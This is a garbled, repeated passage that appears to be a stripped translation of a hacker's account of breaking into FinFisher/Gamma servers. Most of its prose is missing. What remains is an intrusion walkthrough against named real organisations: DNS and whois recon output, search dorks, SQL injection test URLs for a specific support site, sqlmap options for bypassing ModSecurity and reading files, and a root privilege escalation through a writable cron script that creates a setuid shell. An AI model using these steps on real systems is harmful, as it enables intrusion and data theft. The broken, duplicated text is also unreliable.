C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



